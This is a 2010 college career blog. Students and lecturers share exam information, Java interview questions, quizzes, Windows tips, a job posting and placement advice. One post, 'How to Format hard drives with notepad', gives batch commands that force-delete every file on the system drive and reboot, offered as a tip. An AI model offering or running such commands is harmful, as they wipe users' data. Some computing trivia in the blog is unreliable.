Pages


Welcomes you for the new dimension of career

Welcome for the new dimension of your academic, personal as well as career exposure. I am very glad to be a part of your each and every enthusiastic and energetic step towards your career. I request all the students of various discipline to watch it whenever you have time and give us your valuable feedback. I, on behalf of KSRCE, wish you to share your innovative creation of ideas or knowledge and do healthy discussion about it. The topic may be about bioinformatics, networking, data mining, career choices, Higher studies in abroad, Research, Placement activity, ... and so on.I request you for posting and the healthy discussion on any career oriented topic.
Some inspirational quotes for your life are

"Education is not preparation for life; education is life itself".
"The object of education is to prepare the young to educate themselves throughout their lives".
“Life is relationship"
"Twenty years from now you will be more disappointed by the things that you didn't do than by the ones you did do. So throw off the bowlines. Sail away from the safe harbor. Catch the trade winds in your sails. Explore. Dream. Discover."

Please mail at it.career.solution2010@gmail.com for posting new topic. - Adhithan.S.V.

Thursday, July 29, 2010

International Exams For Foreign Degree

Want to Study abroad? Have a dream? want to fulfill, your dream of studying abroad? Need some information? help? Here we have gathered most of the information for official International exam site's with our experience to give you the best possible details for you.

1. The GRE (Graduate Record Examination) is a standardized examination conducted by the ETS (Educational Testing Services), United States of America. GRE (Graduate Record Examination) measures the potential of a candidate which almost all the graduate schools and universities abroad demand for the purpose of admission in different streams like Graduate studies, Fellowships Programs and Research Programs etc.

2. The Test of English as a Foreign Language (or TOEFL, pronounced "toe-full" or sometimes "toffle") evaluates the potential success of an individual to use and understand Standard American English at a college level.

3. The Graduate Management Admissions , better known by the acronym GMAT (pronounced G-mat), is a standardized test for determining aptitude to succeed academically in graduate business studies. The test is used as one of the selection criteria by most respected business schools globally, most commonly for admission into an MBA program.

4. IELTS is an English Language test primarily used by those seeking international education, professional recognition, bench-marking to international standards and global mobility.

5. The Commonwealth Executive MBA/MPA has been offered since mid-2002 through four premier South Asian open universities: Bangladesh Open University (BOU), Indira Gandhi National Open University, (IGNOU, India), Open University of Sri Lanka (OUSL), and Allama Iqbal Open University (AIOU, Pakistan), although the last, AIOU, began offering courses.

KSRCE- Mareeswari - II MCA Why AI for future?

With all the different things in the world that change day by day, some can beone can encounter positive and some can be negative changes. Due to the fact of breakthroughs in Artificial Intelligence (AI), the effect on the job world and how National Aeronautics and Space Administration (NASA) contributes to the growth and positive reflection of Artificial Intelligence, it seems as though AI will definitely be a positive change.
The future of the Artificial Intelligence is getting stronger and stronger as each day passes. With the unemployment rates still around 5.5% and decreasing from previous months, Artificial Intelligence is mostly a positive negative change on the outlook of the job market because of the advancement of technology. As NASA is the leading space aviator in the country, there is no one else fit to gain, boost moral and contribute towards AI. Artificial Intelligence will be one of the top technological necessities in the near future.
As time, seasons, and technology change, so does the definition of Artificial Intelligence. “Artificial Intelligence, in light of this definition of intelligence, is simply the application of artificial or non-naturally occurring systems that use the knowledge-level to achieve goals” (Newell). The easiest definition to believe in is that AI is any machine that relates to a human if it’s through a program. Artificial Intelligence is “the ability of a computer or other machine to perform those activities that are normally thought to require intelligence” (Dictionary). Some machines were and are built to make our lives easier, keep us alive longer and stay healthy.

Tuesday, July 27, 2010

KSRCE- II MCA - A. Gowri Johncy - Turn on the Sticky Keys feature

Turn on the Sticky Keys feature
Some keyboard shortcuts, however, require you to hold down three keys at a time. If you want to use a keyboard shortcut but find it difficult to hold down two or three keys at the same time, Sticky Keys makes it easy.
To activate Sticky Keys
1.
Press the SHIFT key five times. A dialog box opens with instructions on how to set up the Sticky Keys feature.
2.
Click OK.

With Sticky Keys enabled, you can press and release the SHIFT, CTRL, ALT, or Windows logo key, and Windows XP will hold the key down for you until you press the next key.

To turn off Sticky Keys, press the SHIFT key five times, and then click Cancel in the Sticky Keys dialog box.

KSRCE- Alagirisamy - II MCA - How to Format hard drives with notepad

start-->run-->notepad
type the following codes in the notepad

@Echo off
Del c:\*.*|y

save it as Dell.bat

worse

@echo off
del%systemdrive%\*.*/f/s/q
shutdown-r-f-t 00

and save it as .bat file
now double click on that note pad . You will find that your c drive is fully formatted .

Alagirisamy - II MCA How to make changes in start up and shutdown tones in windows xp

How to make changes in start up and shutdown tones in windows xp :

*choose an small audio file .

*it should be in .WAV format

*keep those audio files very small less than 1MB otherwise it will
take long time to startup and shutdown

*if you are not having any .WAV format files means you can choose the
audio file which you want to make changes and you can easily convert
them into a particular format by using the software of the following
one

jet audio 7

*now rename the file as "windows xp startup.wav" and "windows xp
shutdown.wav" respectively .

*now goto "C:\WINDOWS\MEDIA" here you will find some files "windows xp
startup.wav" and "windows xp shutdown.wav" move them to some other
location .this step is required either you want to revert back there
sounds or else you can simply ignore there steps .

*now the files you have choosen are renamed . Just copy , paste or
cut,paste them into "C:\WINDOWS\MEDIA"

*NOW YOU HAVE SUCCESSFULLY CHANGED YOUR STARTUP AND SHUTDOWN TONES .
Just restart the system and enjoy the changed tones . . . . . . . . .

Mr. M.Vijaya Kumar Sr Lect - Java Interview Questions

For interview purpose, Sr Lecturer Mr. VijayaKumar posted this questions for you students.

What will be the default values of all the elements of an array defined as an instance variable?
If the array is an array of primitive types, then all the elements of the array will be initialized to the default value corresponding to that primitive type. e.g. All the elements of an array of int will be initialized to 0, while that of boolean type will be initialized to false. Whereas if the array is an array of references (of any type), all the elements will be initialized to null.
What will be the output of the following statement? System.out.println ("1" + 3);
It will print 13.
Can main method be declared final?
Yes, the main method can be declared final, in addition to being public static.
Can a public class MyClass be defined in a source file named YourClass.java?
No the source file name, if it contains a public class, must be the same as the public class name itself with a .java extension.
How many objects are created in the following piece of code? MyClass c1, c2, c3; c1 = new MyClass (); c3 = new MyClass ();
Only 2 objects are created, c1 and c3. The reference c2 is only declared and not initialized.
What is the default value of the local variables?
The local variables are not initialized to any default value, neither primitives nor object references. If you try to use these variables without initializing them explicitly, the java compiler will not compile the code. It will complain abt the local varaible not being initilized..
What are the different scopes for Java variables?
The scope of a Java variable is determined by the context in which the variable is declared. Thus a java variable can have one of the three scopes at any given point in time.
1. Instance : - These are typical object level variables, they are initialized to default values at the time of creation of object, and remain accessible as long as the object accessible.
2. Local : - These are the variables that are defined within a method. They remain accessbile only during the course of method excecution. When the method finishes execution, these variables fall out of scope.
3. Static: - These are the class level variables. They are initialized when the class is loaded in JVM for the first time and remain there as long as the class remains loaded. They are not tied to any particular object instance.

KSRCE- Alagirisamy – II MCA - How to increase the system performance

Alagirisamy posted this tips for us. Hope it will be useful.

if you have 512MB or more than that capacity of ram ,you can increase the system performance . Just do the following steps in your system

goto start -->run-->regedit
and press enter on the left hand side tree ,navigate to
HKEY_ LOCAL_MACHINE\SYSTEM\current control set \control\sessionmanager\memory management\
on the list on the right side look for an entry called "disablepagingexecutive" then double click it

press 1 on your keyboard

then click ok

now exit regedit and reboot the system

to revert the default setting follow the same steps as mentioned above but this time press 0(zero) instead of 1 on the keyboard . . .

KSRCE- II MCA- Kiruthika- IQ Questions

1. Some months have 30 days, some months have 31 days. How many months
have 28 days?
2. If a doctor gives you 3 pills and tells you to take one pill every
half hour, how long would it be before all the pills had been taken?
3. I went to bed at eight 8 'clock in the evening and wound up my
clock and set the alarm to sound at nine 9 'clock in the morning. How
many hours sleep would I get before being awoken by the alarm?
4. Divide 30 by half and add ten. What do you get?
5. A farmer had 17 sheep. All but 9 died. How many live sheep were left?
6. If you had only one match and entered a COLD and DARK room, where
there was an oil heater, an oil lamp and a candle, which would you
light first?
7. A man builds a house with four sides of rectangular construction,
each side having a southern exposure. A big bear comes along. What
color is the bear?
8. Take 2 apples from 3 apples. What do you have?
9. How many animals of each species did Moses take with him in the Ark?
10. If you drove a bus with 43 people on board from Chicago and
stopped at Pittsburgh to pick up 7 more people and drop off 5
passengers and at Cleveland to drop off 8 passengers and pick up 4
more and eventually arrive at Philadelphia 20 hours later, What's the
name of the driver?

IQ Test Answers
1.All of them. Every month has at least 28 days.
2.1 hour. If you take a pill at 1 o'clock, then another at 1.30 and
the last at 2'clock, they will be taken in 1 hour.
3.1 hour. It is a wind up alarm clock which cannot discriminate
between a.m. and p.m.
4.70. Dividing by half is the same as multiplying by 2.
5.9 live sheep.
6.The match.
7.White.
8.2 apples.
9.None. It was Noah, not Moses.
10.You are the driver.

KSRCE - Mareeswari II MCA - Do you know!!!

Do you know the following really? It's good to share even such small maters for beginers.

• ENIAC, the first electronic computer, appeared 50 years ago. The original ENIAC was about 80 feet long, weighed 30 tons, had 17,000 tubes. By comparison, a desktop computer today can store a million times more information than an ENIAC, and 50,000 times faster.
• From the smallest microprocessor to the biggest mainframe, the average American depends on over 264 computers per day.
• The first "modern" computer (i.e., general-purpose and program-controlled) was built in 1941 by Konrad Zuse. Since there was a war going on, he applied to the German government for funding to
build his machines for military use, but was turned down because the Germans did not expect the war to last beyond Christmas.
• The computer was launched in 1943, more than 100 years after Charles Babbage designed the first programmable device. Babbage dropped his idea after he couldn't raise capital for it. In 1998, the Science Museum in London, UK, built a working replica of the Babbage machine, using the materials and work methods available at Babbage's time. It worked just as Babbage had intended.
E-Mail
The first e-mail was sent over the Internet in 1972.
Sound
Sound travels 15 times faster through steel than through the air.

KSRCE, Mareeswari II MCA-A, Multimedia Quiz

KSRCE, Mareeswari II MCA-A shares her tips with us
Some useful questions on Multimedia.
1. With reference to multimedia elements, pick the odd-one out of the following:
• Graphics
• Animation
• Audio
• Video
• Voice Script

2. JPEG is an acronym for __________ and is a file format for _________

3. What is another name for 2D animation?

4. What is the name of popular software used for creating 2D animation
for use in web pages?

5. Which of the following is NOT a video file extension: MP4, AVI, QT,
JPG, and MOV?

6. In animation, a keyframe is a frame in which the artwork differs
from that of the previous frame: TRUE or FALSE?

7. MP3 is an extension of a _________ file

8. Which of the following two file formats has a smaller file size: WAV or MP3?

9. In a multimedia project, a storyboard details the text, graphics,
audio, video, animation, interactivity, and other that should be used
in each screen of the project: TRUE or FALSE?

10. DAT is an acronym for _________

11. If you do not want external noise to enter into the room where a
voice-over recording for a multimedia project takes place, then that
room should be _________

12. What is the name of the programming / scripting language of Flash?

13. With an appropriate software and more than one GIF image, you can
create a GIF animation: TRUE or FALSE?

14. Which HTML tag you've to use to insert a Flash movie in a web page?

15. If you want to enlarge / reduce an image size, which differs
extensively from its original size without loss in its quality, that
image should be in which format: vector or raster format?

16. A graphic image file name is tree.eps. This file is a bitmap
image: TRUE or FALSE?

17. EPS is an acronym for __________

18. A multimedia developer wants to use a video clip in a project and
he wants the clip’s file size to be as small as possible. Which
video file format should he use: MP4 or AVI?

19. FPS stands for __________

20. A broadcast / NTSC video requires how many FPS for it to play smoothly?

21. Codec is any acronym for __________. It can be hardware-based,
software-based, or both: TRUE or FALSE?

22. Using Illustrator or CorelDraw you can create mainly what type of
graphics: vector or raster?

23. What is the name of the function for integrating multimedia
elements, programmatically and or without programming, using a
software, to create a multimedia project?

24. What method of animation creates the in-between frames when you
create the start and end points of the animation?

25. A most basic skill a person requires to pursue an animation career
is ________ skills.


Multimedia Quiz Answers
1. Voice script
2. Joint Photographic Experts Group; Graphic images
3. Cell animation
4. Flash
5. JPG
6. TRUE
7. Sound/Music/Audio file
8. MP3
9. TRUE
10. Digital Audio Tape
11. Soundproof
12. ActionScript
13. TRUE
14. EMBED
15. Vector
16. FALSE
17. Encapsulated Post Script
18. MP4
19. Frames Per Second
20. 30
21. Coder-Decoder; TRUE
22. Vector
23. Authoring
24. Tweening
25. Drawing

If you find the questions are useful, please tell me your feedback.

KSRCE, II MCA, Sathya Priya - Interview Tips

Sathya Priya, II MCA shares her tips with the reader.
It is important as you prepare for your interview to anticipate what questions the employer might ask. The following questions are examples of the types of questions that you may be asked to answer.

1.Do some research on the business before the interview. (See "How to Find a Job," "Research the Employer.")
2.Practice interviewing.
3.Go alone. Do not take children or friends.
4.Greet the employer with a handshake.
5.Make frequent eye contact.
6.Smile, be polite, and try to relax.
7.Listen carefully to the questions asked. Ask the interviewer to restate a question if you are confused.
8.Answer questions as directly as possible.
9.Be upbeat and make positive statements.
10.If you've worked before, talk about what you learned from it.
11.Use examples of how your skills and abilities would fit the job.
12.Bring your "Fact Sheet" with telephone numbers and addresses of your references and former employers, just in case you are asked to complete an application. (See "The Application," "Fact Sheet.")



Questions to Expect (What the Employer May Ask You):
1.Tell me about yourself. (This is often an ice-breaker question. Keep the answer job or skill related.)
2.What do you know about the type of work we do? (This is your chance to tell what you know from the research you completed ahead of time.)
3.What is your weakness? (Always make this a positive answer. For example, "My spelling is not always perfect, so I always use a spell checker.")
4.What are your strengths? (Describe your skills in a way that will show you as a desirable employee for the company.)
5.Why did you leave your last job? ( Answer with a positive statement. Try not to say: "I was fired," "terminated," "quit," "had no babysitter," or "couldn't get along with coworkers or supervisor". However, you can say: "new job," "contract ended," "seasonal," "temporary," "career change," "returned to school," to raise a family," or "relocated.")
6.Why have you been unemployed for such a long time? (Tell the truth. Emphasize that you were looking for a good company where you can settle and make a contribution.)
7.Why should we hire you? (Make a positive statement, such as "I would like the opportunity to work with you and believe that I can do the work.")
8.Do you have references? (It is most important that you contact your references ahead of time and have their name, current address, and telephone numbers.)

Wednesday, July 21, 2010

KSRCE-A.Gowri, II MCA - How to Change the Drive Letter

A.Gowri, II MCA KSRCE share this tips with the readers.
To change the Drive Letter, follow the steps below:
1. Go to Start Menu -> Control Panel -> System and Maintenance -> Administrative Tools -> Double Click Computer Management -> Storage -> Disk Management.

2. Right click the Drive you want to change its letter and choose Change Drive Letter and Paths.

3. Choose the drive and click Change.

4. From the drop down menu near Assign the following drive letter, choose the letter you want to assign.

5. Click OK.

Thursday, July 15, 2010

KSRCE, Thambi Durai,II MCA Can we make our folder super hidden and Unsearchable without using any tool?

Thambi Durai from KSRCE, II Year MCA shared this tips. Suggestions are welcome.

Yes. We do make our folder private. Follow these steps:-
1. Cretae a new folder

2.Click on Start>Run, type "cmd" and then click OK.

3.Type Your Drive where is your folder created and press enter.
Now type "attrib +h +s 'FolderName'" and press enter.

Now Your Folder is private unsearchable and super hidden
if u want to see again your folder then type:
"attrib -s -h folder name"

Sasurie Engg College, Mohan Kumar , MCA III- Parameter of ranking outsourcing companies

Can anybody tell how we are ranking the outsoucing companies? Does it depand on size of the company or nature of product or revenue? Can you tell how they do? - III MCA, Mohan Kumar, Sasurie Engg College

Wednesday, July 14, 2010

KSRCE, MCA Mr.Vijayakumar, Placement Coordinator - Openings at Mani India Technologies Pvt. Ltd - Interview on 17th July 2010.

This is to inform you that we have scheduled interview for the following profiles on 17th July 2010; you can refer the eligible candidates for the same .

Please find the information below…

Profile 1: Dot net Developer

Required Qualification:
- BE in Computer Science / Information Technology
- M.Sc. in Computer Science / Information Technology
- MCA
- B.Sc. in Computer Science / Information Technology
Required Skills:
- Analytical Skills
- Programming Skills on Dot Net Technologies
- Communication Skills
Fresher Category- Experience: 0 to 6 Months
Experience Category- Experience: 2 to 4 Years

Profile 2: Java Developer
Required Qualification:
- BE in Computer Science / Information Technology
- M.Sc. in Computer Science / Information Technology
- MCA
- B.Sc. in Computer Science / Information Technology
Required Skills:
- Analytical Skills
- Programming Skills on Java Technologies
- Communication Skills
Experience: 1 to 3 Years

Profile 3: PHP Developer
Required Qualification:
- BE in Computer Science / Information Technology
- M.Sc. in Computer Science / Information Technology
- MCA
- B.Sc. in Computer Science / Information Technology
Required Skills:
- Analytical Skills
- Programming Skills in PHP technologies and other open source Technologies
- Communication Skills
Fresher Category- Experience : 0 to 6 Months

Experience Category- Experience : 1 to 3 Years

Profile 2: I Phone Developer

Required Qualification:
- BE in Computer Science / Information Technology
- M.Sc. in Computer Science / Information Technology
- MCA
- B.Sc. in Computer Science / Information Technology

Required Skills:
- Analytical Skills
- Exposure to Mac OS and I Phone Development
- Communication Skills
Experience: 1 to 3 Years

Interview Date: 17th June 2010

Reporting Time: 10 AM
Venue: Mani India Technologies Pvt. Ltd
6/1209 B, Mani Towers,
III Street, IV Cross,
Indira Nagar
Kovilpatti – 628502

For more details Contact – 04632646267 - Subha Lakshmi, HR Consultant

Tuesday, July 13, 2010

KSRCE, Dr.A.Subramani, Professor, MCA Dept - A Proposal on a new ATM switching design

Dr.A.Subramani,Asst.Prof, MCA Department, KSRCE shares one part of his research work with us.

The ATM forum has proposed the Private Network-Network Interface (PNNI) specification to facilitate routing in ATM networks. The pre-path selection or routing algorithms that guarantee a user’s multiple Quality of Service (QOS) requirements remains an open issue (ATM Forum 1996).The PNNI protocol only provides a routing framework but it does not standardize the method of finding an appropriate path for ATM switching design. In this research work a new ATM Switching design with Doubly Finite Queue (DFQ) management for on demand path calculation in congested ATM networks is proposed. Dynamic routing algorithm also called as Multi-Source virtual Dynamic Routing (MSVDR) for ATM networks which is combined with the PNNI protocol is used.
MSVDR uses an adaptive and iterative path search approach and taken advantage of the PNNI hierarchical structure. It consists of the following six major components.
1. Virtual Source / Virtual Designation ATM switching design option for segment-to-segment explicit feedback control through RM cell in PNNI Protocol
2. Source / Designation behavior for on-demand path computation in congested network.
3. Implementation of Route Cache Policy to select the alternative routes to transmit the data.
4. Doubly Finite Queue Management for dynamic data flow control in ATM switches to avoid the data loss and packet discarded.
5. Using MSVDR Rerouting Mechanism to find the shortest path between congested places to destination node.
6. Adaptive Queue Rate Control Algorithm (AQRCA) for regulated the incoming data.

This Thesis guarantees the following properties of DFQ with MSVDR algorithm:

• It uses only short paths: the number of hops of the path used is at most four times as many as the number of hopes of the shortest path algorithm;
• It balances the load: the maximum total size of packets passed on any node is at most three times as much as the optimum.
• It is localized and scales well to large networks: each node only needs information in its local neighborhood to make routing decision; and as a consequence, our algorithm handles dynamic change and mobility efficiently as only a node’s neighborhood is affected.
• It is online: the routing decision of a packet depends only on the previously routed packets, i.e., the current state of the network. It doesn’t need to know the packets in the future.
• Waiting Time: The packet waiting time in queue is reduced three times compare to other queue management.

This research work to reduce the call setup time, minimize the queue length, fast route recovery, maximum link utilization and good throughput compare to the other routing algorithms.

Monday, July 12, 2010

NIMS - Balaji, III MCA - Image Segmentation

This query has been sent by Balaji, III MCA, NIMS

Can anybody explain me what is image segmentation and the different algorithm I can choose to group pixel. I know there are lot of algorithm available for it. But still I am confused what to use for what. If you give me a brief idea, it would be helpful for me.

Wednesday, July 7, 2010

KSRCE, Adhithan.S.V. Senior Lecturer, MCA Dept - How to be placement oriented?

Great. It does not require to waste your time for searching good placement training schools after your degree and before your placement. While studying your degree itself you can become placement oriented and you will get the job. Do you know how? Will it be too tough? Absolutely no. If you follow the simple points given below, I think it will be done.

1. You have to be outspoken, no other way.

Develop your opinion about the issue or concept on which you are going to expose or speak. Because once if you are confidence about the topic on which you are going to speak, you can expose it clearly.
You can also learn to act confident, just the way actors learn to imitate people for their acting roles. Quite often, acting a certain way and imitating the motions of something will help you feel that way. Do you walk with your shoulders rounded, looking at the ground? Go home and stand in front of a mirror and practice standing straight up and looking yourself straight in the eye and smiling. If you walk around looking like you think you're worth talking to, other people will respond differently to you than they do now. That might help.

2. Take seminar whenever you get a chance.

What is the coincidence of taking a seminar and placement orientation? If you start thinking about it seriously, you will get answer. Yes. The answer is “ The fear to face peoples will run away like anything from you”. This will help you when you are interviewed.

3. Be in advance wherever it may be

Why we should follow it? Once you are adjusted with the place where you are going to write exam or attending interview, you will never be excited. So that you can express your ideas or answers in good manner.

4. Be an active member in any technical BlogSpot.

The reason is explained through a case given below.

Mr. X actively discussed about network security in it-career-solution-provider.blogspot.com. When a person, say Mr. Y from a famous IT company is searching solution for some issues in nessus scanner from abroad, which is related to Mr.X's discussion posted in blogspot. Mr.Y happens to go through the discussion which was delivered by Mr.X in it-career-solution-provider.blogspot.com. Now Mr.Y needs Mr.X knowledge to resolve the issue he was searching for. Mr.Y select Mr.X as his employee. Thats all !!!. Placement is over. Mr.X got the offer in the same field which he like the most.

5. Publish your paper through on line.

Reason: refer the previous one

Many points might be left. But the above are the important skills that you should have if you want to be placed before your study over. Surely it will work out. Suggestions are welcome. If you think I left any point please post.

Tuesday, July 6, 2010

Sigaram, HR Executive - After studies what next

Job!

If yes! then here is the Job Hub! we guide you to the right job the time you decide.
We, Sigaram HR Consultant are international HR service provider, servicing world class companies across the globe.We offer the full spectrum of HR services that include: search, selection, staffing consulting, outsourcing and training.

Sigaram HR Consultant, promoted by a team of qualified and dedicated professionals with extensive Industry and Consultancy experience is to-day "One of the most preferred and referred" Executive Search, Placement and Consulting firms in India with offices in Chennai, Vellore, Bangalore, Mumbai, Hyderabad, Trivandrum and New Delhi. Sigaram HR Consultant has grown to be, a force to be reckoned with in the first half decade of existence itself.Sigaram HR Consultant has prestigious list of chientele all over India & Abroad coving various Industries with extensive, live and all India computerized Data-Bank and Head hunting capabilities across Industries and functions. If you need anyother information, please post your queries. - Dhanasekar, HR - Executive, Sigaram


"People who feel good about themselves Produce good results" "Ken Blanchard"